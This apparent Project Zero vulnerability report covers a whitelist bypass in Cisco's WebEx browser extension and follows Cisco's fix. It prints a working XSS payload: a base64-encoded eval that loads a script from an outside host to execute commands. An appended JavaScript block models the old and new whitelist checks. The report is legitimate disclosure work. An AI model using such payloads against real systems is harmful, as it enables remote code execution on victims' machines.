Status: Fixed
Closed: Jan 2017

Blocked on: issue 1324, issue 1096

Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass
Project Member Reported by, Jan 25 2017
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096.

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: Windows 10-2017-01-24-19-23-30.png (822 KB)
Project Member Comment 1 by, Jan 25 2017
Project Member Comment 2 by, Jan 25 2017
Project Member Comment 3 by, Jan 25 2017
I made some minor changes to the exploit script.
Attachment (7.1 KB)
Project Member Comment 4 by, Jan 26 2017
Hi Tavis,

We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.
Project Member Comment 5 by, Jan 26 2017
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco; I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
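As an added illustration (not Cisco's code and not part of this thread) of why the 1.0.5 check in the report was bypassable and what the 1.0.7 check in comment 5 adds, the following models both policies over constructed requests; the property names come from the thread, while the whitelist contents, the identifier pattern and the sample requests are assumptions.

```javascript
// Added model of the whitelist checks described in this thread, not Cisco's code.
// Property names come from the report; the whitelist contents, the function-name
// pattern and the request shapes below are assumptions/constructed samples.

// Assumed whitelist of module names the native component may load.
const MODULE_WHITELIST = new Set(["example_module_a.dll", "example_module_b.dll"]);
// Assumed pattern for the init/exit entry points: a bare C identifier only.
const FUNCTION_NAME_RE = /^[A-Za-z_][A-Za-z0-9_]*$/;

// 1.0.5 as described in the report: only GpcComponentName is whitelisted; the
// properties that choose which file is fetched under GpcUrlRoot and unpacked
// (GpcExtName, GpcUnpackName) are not checked at all.
function validate_1_0_5(p) {
  return MODULE_WHITELIST.has(p.GpcComponentName);
}

// 1.0.7 as described in comment 5: every module-selecting property must be
// whitelisted, and GpcInitCall/GpcExitCall must match the pattern.
function validate_1_0_7(p) {
  for (const f of ["GpcComponentName", "GpcExtName", "GpcUnpackName"]) {
    if (!MODULE_WHITELIST.has(p[f])) return false;
  }
  for (const f of ["GpcInitCall", "GpcExitCall"]) {
    if (typeof p[f] !== "string" || !FUNCTION_NAME_RE.test(p[f])) return false;
  }
  return true;
}

// Both verdicts for one request, so the two policies can be compared directly.
function compareValidators(p) {
  return { v105: validate_1_0_5(p), v107: validate_1_0_7(p) };
}

// Constructed sample: a consistent, legitimate load request.
const benignRequest = {
  GpcComponentName: "example_module_a.dll",
  GpcExtName: "example_module_a.dll",
  GpcUnpackName: "example_module_a.dll",
  GpcInitCall: "ExampleInit",
  GpcExitCall: "ExampleExit",
};

// Constructed sample shaped like the bypass in the report: the whitelisted
// component name is kept, but the file fetched is a different Cisco-signed
// module (MSVCRT.DLL) that the installer writes over the whitelisted one.
const bypassRequest = { ...benignRequest, GpcExtName: "MSVCRT.DLL" };

console.log(compareValidators(benignRequest)); // { v105: true, v107: true }
console.log(compareValidators(bypassRequest)); // { v105: true, v107: false }
```

The point the two verdicts make is the one in the thread: a whitelist on a single property is only as strong as the unchecked properties that decide what actually lands on disk.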
Project Member Comment 6 by, Jan 26 2017
Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member Comment 7 by, Feb 3 2017
Labels: -Reported-2017-01-24 Reported-2017-Jan-24
Comment 8 Deleted
Comment 9 Deleted
Comment 10 Deleted
Project Member Comment 11 by, Jul 6
Blockedon: 1324